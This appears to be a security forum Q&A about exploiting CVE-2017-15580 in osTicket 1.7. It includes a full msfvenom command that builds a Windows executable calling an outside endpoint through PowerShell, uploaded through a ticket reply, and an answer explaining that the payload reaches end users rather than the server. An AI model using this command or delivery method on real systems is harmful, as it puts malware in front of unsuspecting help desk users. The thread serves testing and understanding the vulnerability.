# CVE-2017-15580: Getting code execution with upload

Tags: file-upload

I'm testing a target with [osTicket 1.7](https://github.com/osTicket/osTicket-1.7) for [CVE-2017-15580](https://www.exploit-db.com/exploits/45169). Instead of getting a shell, I'm trying to get the target to make an HTTP request to a temporary end-point.

My temporary end-point is `https://test.free.beeceptor.com` and the command to be executed is `powershell "IWR https://test.free.beeceptor.com"`. I've generated my payload as follows:

```
msfvenom -a x86 --platform windows -p 'windows/exec' CMD='powershell "IWR https://test.free.beeceptor.com"' -b "\x00" -e 'cmd/powershell_base64' -f exe -o IWR.exe
```

I then uploaded `IWR.exe` using an ticket reply. The CVE says that an HTML file is needed to bypass the  client-side filter, but I was able to upload the `.exe` file as is without trouble.

[image: IWR.exe included in reply]

However, the file `IWR.exe` is just attached to be downloaded later in the posted reply. Going to `https://target.com/file.php?key=MY_KEY&expires=1337&signature=SIG_GOES_HERE` (the supposed location of `IWR.exe`) just prompts me to download the file without any sign of execution as there seems to be no log of a request made to `https://beeceptor.com/console/test`. I've also tried using the `Print` function but that just let me download a PDF of the ticket without executing `IWR.exe`.

What am I doing wrong? How do I get the target to execute my payload?

Answer (score 7):

I don't think that you read the CVE or the PoC properly.

The PoC says that the reverse shell is to get a shell **"of the end user"**. Not the server.

So, you are not doing anything wrong. You are just expecting something that is not meant to happen.

Comment: In my test, I'm not trying to get a reverse shell at all. I'm just  trying to get the server to run some code that makes a request to a temporary end-point.

Comment: Right. But the vulnerability is not about the server running anything... It's only about uploading an exe that gets delivered to someone else, and that someone else runs the payload (the "end user"). You are expecting the server to run the exe, but there is nothing in the PoC that says that happens or is even possible...